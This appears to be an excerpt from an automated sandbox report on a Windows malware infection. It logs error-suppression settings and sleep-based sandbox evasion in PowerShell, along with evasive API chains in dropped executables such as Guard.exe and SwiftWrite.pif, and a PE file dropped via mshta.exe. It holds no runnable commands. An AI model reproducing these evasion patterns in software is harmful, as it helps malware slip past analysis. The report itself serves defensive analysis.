Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1555	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1314	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1438	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4482	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5307	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4557

Source: C:\Windows\System32\mshta.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1]

Jump to dropped file

Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_23-100032

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	API coverage: 3.7 %
Source: C:\Users\Public\Guard.exe	API coverage: 6.6 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	API coverage: 4.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 1438 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep count: 281 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7908	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5392	Thread sleep time: -922337203685477s >= -30000s
